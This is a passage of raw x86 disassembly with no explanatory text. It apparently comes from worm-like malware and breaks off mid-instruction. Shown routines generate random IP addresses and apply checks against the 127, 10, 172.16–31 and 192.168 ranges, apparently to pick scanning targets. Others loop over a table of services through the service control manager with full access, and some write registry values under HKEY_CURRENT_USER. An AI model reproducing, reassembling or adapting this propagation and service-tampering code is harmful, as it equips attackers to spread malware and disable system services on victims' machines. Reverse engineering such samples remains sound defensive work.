mov ebp, esp
sub esp, 34h
push esi
push edi
push 31h
lea eax, [ebp+var_32]
push eax
call sub_43F585
cmp eax, 0FFFFFFFFh
jnz short loc_43EDAE
xor eax, eax
jmp short loc_43EDC8
; ---------------------------------------------------------------------------
loc_43EDAE: ; CODE XREF: sub_43ED92+16�j
lea eax, [ebp+var_32]
push eax
call sub_43F579
mov edi, eax
or edi, edi
jnz short loc_43EDC1
xor eax, eax
jmp short loc_43EDC8
; ---------------------------------------------------------------------------
loc_43EDC1: ; CODE XREF: sub_43ED92+29�j
mov eax, [edi+0Ch]
mov esi, [eax]
mov eax, [esi]
loc_43EDC8: ; CODE XREF: sub_43ED92+1A�j
; sub_43ED92+2D�j
pop edi
pop esi
leave
retn
sub_43ED92 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
push edi
call sub_43F701
push eax
call sub_43F91D
mov esi, 254h
mov eax, esi
add eax, 0Ah
push eax
push 0
call sub_43F73D
mov ebx, eax
push esi
push 4040BFh
push ebx
call sub_43F8D5
add esp, 10h
loc_43EE06: ; CODE XREF: .data:0043EE20�j
; .data:0043EE5A�j ...
call sub_43ED92
mov [ebp-10Ch], eax
or eax, eax
jnz short loc_43EE22
push 384h
call sub_43F8BD
pop ecx
jmp short loc_43EE06
; ---------------------------------------------------------------------------
loc_43EE22: ; CODE XREF: .data:0043EE13�j
mov al, [ebp-10Ch]
mov [ebp-111h], al
mov al, [ebp-10Bh]
mov [ebp-112h], al
mov al, [ebp-10Ah]
mov [ebp-135h], al
cmp byte ptr [ebp-111h], 7Fh
jnz short loc_43EE5C
push 384h
call sub_43F8BD
pop ecx
jmp short loc_43EE06
; ---------------------------------------------------------------------------
loc_43EE5C: ; CODE XREF: .data:0043EE4D�j
lea eax, [ebp-130h]
push eax
call sub_43E630
push 0
call sub_43F8BD
add esp, 8
call sub_43F8F9
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-134h], dl
call sub_43F8F9
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-131h], dl
call sub_43F8F9
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-132h], dl
call sub_43F8F9
mov ecx, 0Ah
cdq
idiv ecx
mov [ebp-133h], dl
mov al, [ebp-133h]
cmp al, 5
jnb short loc_43EEF9
mov al, [ebp-112h]
mov [ebp-134h], al
mov al, [ebp-133h]
cmp al, 3
jnb short loc_43EEF9
mov al, [ebp-135h]
mov [ebp-131h], al
loc_43EEF9: ; CODE XREF: .data:0043EED5�j
; .data:0043EEEB�j
cmp byte ptr [ebp-111h], 0Ah
jnz short loc_43EF2E
movzx eax, byte ptr [ebp-132h]
push eax
movzx eax, byte ptr [ebp-131h]
push eax
movzx eax, byte ptr [ebp-134h]
push eax
push offset sub_404D49
lea eax, [ebp-130h]
push eax
call sub_43F911
add esp, 14h
loc_43EF2E: ; CODE XREF: .data:0043EF00�j
movzx eax, byte ptr [ebp-111h]
cmp eax, 0ACh
jnz short loc_43EF88
mov al, [ebp-112h]
cmp al, 0Fh
jbe short loc_43EF88
cmp al, 21h
jnb short loc_43EF88
call sub_43F8F9
movzx edi, byte ptr [ebp-132h]
push edi
movzx edi, byte ptr [ebp-131h]
push edi
mov edx, eax
and edx, 8000000Fh
jge short loc_43EF6E
dec edx
or edx, 0FFFFFFF0h
inc edx
loc_43EF6E: ; CODE XREF: .data:0043EF67�j
mov edi, edx
add edi, 10h
push edi
push offset sub_404D3C
lea edi, [ebp-130h]
push edi
call sub_43F911
add esp, 14h
loc_43EF88: ; CODE XREF: .data:0043EF3A�j
; .data:0043EF44�j ...
movzx eax, byte ptr [ebp-111h]
cmp eax, 0C0h
jnz short loc_43EFC8
movzx eax, byte ptr [ebp-112h]
cmp eax, 0A8h
jnz short loc_43EFC8
movzx eax, byte ptr [ebp-132h]
push eax
movzx eax, byte ptr [ebp-131h]
push eax
push 404D2Eh
lea eax, [ebp-130h]
push eax
call sub_43F911
add esp, 10h
loc_43EFC8: ; CODE XREF: .data:0043EF94�j
; .data:0043EFA2�j
lea eax, [ebp-130h]
push eax
call sub_43F59D
cmp [ebp-10Ch], eax
jz loc_43EE06
push dword ptr [ebp-10Ch]
call sub_43F5A9
movzx edi, word ptr ds:loc_404094
push edi
push eax
push 404D27h
lea edi, [ebp-0FFh]
push edi
call sub_43F911
add esp, 10h
loc_43F008: ; CODE XREF: .data:0043F031�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_43F011: ; CODE XREF: .data:0043F016�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F011
cmp eax, 19h
jz short loc_43F033
push offset sub_404D25
lea eax, [ebp-0FFh]
push eax
call sub_43F929
add esp, 8
jmp short loc_43F008
; ---------------------------------------------------------------------------
loc_43F033: ; CODE XREF: .data:0043F01B�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_43F03C: ; CODE XREF: .data:0043F041�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F03C
push eax
lea edi, [ebp-0FFh]
push edi
mov edi, ebx
add edi, 9
push edi
call sub_43F8D5
add esp, 0Ch
lea eax, [ebp-130h]
push eax
call sub_43F59D
push esi
push ebx
push eax
call sub_43E731
add esp, 0Ch
mov [ebp-13Ch], eax
push 0
call sub_43F8BD
add esp, 4
jmp loc_43EE06
; ---------------------------------------------------------------------------
db 5Fh, 5Eh, 5Bh
dd 4C2C9h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F08C proc near ; CODE XREF: .data:0043F0CE�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
call sub_43F70D
cmp eax, 80000000h
jb short loc_43F0A3
mov eax, 3Ch
jmp short locret_43F0C4
; ---------------------------------------------------------------------------
loc_43F0A3: ; CODE XREF: sub_43F08C+E�j
push 0
lea eax, [ebp+var_4]
push eax
call sub_43F5F1
and [ebp+var_4], 2
cmp [ebp+var_4], 2
jnz short loc_43F0BF
mov eax, 12Ch
jmp short locret_43F0C4
; ---------------------------------------------------------------------------
loc_43F0BF: ; CODE XREF: sub_43F08C+2A�j
mov eax, 64h
locret_43F0C4: ; CODE XREF: sub_43F08C+15�j
; sub_43F08C+31�j
leave
retn
sub_43F08C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
call sub_43F08C
mov ebx, eax
lea eax, [ebp-4]
push eax
push 0
push 0
push 401565h
push 0
push 0
call sub_43F79D
push eax
call sub_43F6F5
xor esi, esi
jmp short loc_43F127
; ---------------------------------------------------------------------------
loc_43F0F5: ; CODE XREF: .data:0043F129�j
lea eax, [ebp-4]
push eax
push 0
push 0
push 401E23h
push 0
push 0
call sub_43F79D
push eax
call sub_43F6F5
mov eax, 0EA60h
xor edx, edx
div ebx
mov [ebp-8], eax
mov edi, eax
push eax
call sub_43F8BD
pop ecx
inc esi
loc_43F127: ; CODE XREF: .data:0043F0F3�j
cmp esi, ebx
jb short loc_43F0F5
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F132 proc near ; CODE XREF: sub_43F401+AC�p
var_388 = dword ptr -388h
var_384 = dword ptr -384h
var_380 = dword ptr -380h
var_37C = dword ptr -37Ch
var_378 = dword ptr -378h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = byte ptr -36Ch
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_164 = dword ptr -164h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 388h
push ebx
push esi
push edi
lea edi, [ebp+var_16C]
lea esi, sub_404A38
mov ecx, 51h
rep movsd
and [ebp+var_24], 0
loc_43F155: ; CODE XREF: sub_43F132+211�j
push 0F003Fh
push 0
push 0
call sub_43F845
mov [ebp+var_28], eax
or eax, eax
jz loc_43F33C
push 0F003Fh
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_370], eax
push [ebp+eax+var_16C]
push [ebp+var_28]
call sub_43F851
mov ebx, eax
or eax, eax
jz loc_43F334
lea eax, [ebp+var_20]
push eax
push 1
push ebx
call sub_43F82D
mov [ebp+var_4], eax
and [ebp+var_4], 0
loc_43F1AD: ; CODE XREF: sub_43F132+A4�j
lea eax, [ebp+var_20]
push eax
push 4
push ebx
call sub_43F82D
or eax, eax
jz short loc_43F1C3
cmp [ebp+var_1C], 1
jnz short loc_43F1C5
loc_43F1C3: ; CODE XREF: sub_43F132+89�j
jmp short loc_43F1D8
; ---------------------------------------------------------------------------
loc_43F1C5: ; CODE XREF: sub_43F132+8F�j
push 3E8h
call sub_43F779
inc [ebp+var_4]
cmp [ebp+var_4], 0Ah
jb short loc_43F1AD
loc_43F1D8: ; CODE XREF: sub_43F132:loc_43F1C3�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_374], eax
cmp [ebp+eax+var_168], 0
jz short loc_43F1F6
push ebx
call sub_43F839
loc_43F1F6: ; CODE XREF: sub_43F132+BC�j
push ebx
call sub_43F821
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_378], eax
cmp [ebp+eax+var_164], 0
jz loc_43F334
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_37C], eax
mov eax, [ebp+eax+var_164]
cmp byte ptr [eax], 0
jnz loc_43F2BC
push 0
push 18h
lea eax, [ebp+var_36C]
push eax
push 0
call sub_43F5FD
or eax, eax
jz short loc_43F2BC
lea ecx, [ebp+var_36C]
or eax, 0FFFFFFFFh
loc_43F255: ; CODE XREF: sub_43F132+128�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F255
mov [ebp+var_4], eax
cmp [ebp+var_4], 1
jbe short loc_43F289
mov eax, [ebp+var_4]
sub eax, 1
cmp [ebp+eax+var_36C], 5Ch
jz short loc_43F289
push 404BA0h
lea eax, [ebp+var_36C]
push eax
call sub_43F929
add esp, 8
loc_43F289: ; CODE XREF: sub_43F132+131�j
; sub_43F132+141�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_380], eax
mov eax, [ebp+eax+var_164]
push dword ptr [eax+8]
lea eax, [ebp+var_36C]
push eax
call sub_43F929
add esp, 8
lea eax, [ebp+var_36C]
push eax
call sub_43F7A9
loc_43F2BC: ; CODE XREF: sub_43F132+FE�j
; sub_43F132+118�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_380], eax
mov eax, [ebp+eax+var_164]
cmp byte ptr [eax], 1
jnz short loc_43F334
lea eax, [ebp+var_4]
push eax
push 20006h
push 0
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_384], eax
mov edx, [ebp+eax+var_164]
push dword ptr [edx+4]
mov eax, [ebp+eax+var_164]
push dword ptr [eax+0Ch]
call sub_43F881
or eax, eax
jnz short loc_43F334
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_388], eax
mov eax, [ebp+eax+var_164]
push dword ptr [eax+8]
push [ebp+var_4]
call sub_43F85D
push [ebp+var_4]
call sub_43F875
loc_43F334: ; CODE XREF: sub_43F132+62�j
; sub_43F132+E0�j ...
push [ebp+var_28]
call sub_43F821
loc_43F33C: ; CODE XREF: sub_43F132+36�j
inc [ebp+var_24]
cmp [ebp+var_24], 1Bh
jb loc_43F155
pop edi
pop esi
pop ebx
leave
retn 4
sub_43F132 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push edi
mov eax, [ebp+0Ch]
cmp eax, 10h
jz short loc_43F3DE
jg short loc_43F36B
cmp eax, 2
jz short loc_43F3D5
jmp loc_43F3EB
; ---------------------------------------------------------------------------
loc_43F36B: ; CODE XREF: .data:0043F35F�j
cmp eax, 113h
jnz short loc_43F3EB
and dword ptr [ebp-4], 0
mov dword ptr [ebp-8], 4
lea eax, [ebp-10h]
push eax
lea eax, [ebp-8]
push eax
lea eax, [ebp-4]
push eax
push 404B81h
push offset sub_404B85
push 80000001h
call sub_43E370
mov eax, dword ptr ds:sub_404098
mov [ebp-0Ch], eax
add [ebp-4], eax
push 4
push 4
lea eax, [ebp-4]
push eax
push 404B81h
push offset sub_404B85
push 80000001h
call sub_43E305
add esp, 30h
push 0
push offset sub_404098
call sub_43F725
jmp short loc_43F3FC
; ---------------------------------------------------------------------------
loc_43F3D5: ; CODE XREF: .data:0043F364�j
push 0
call s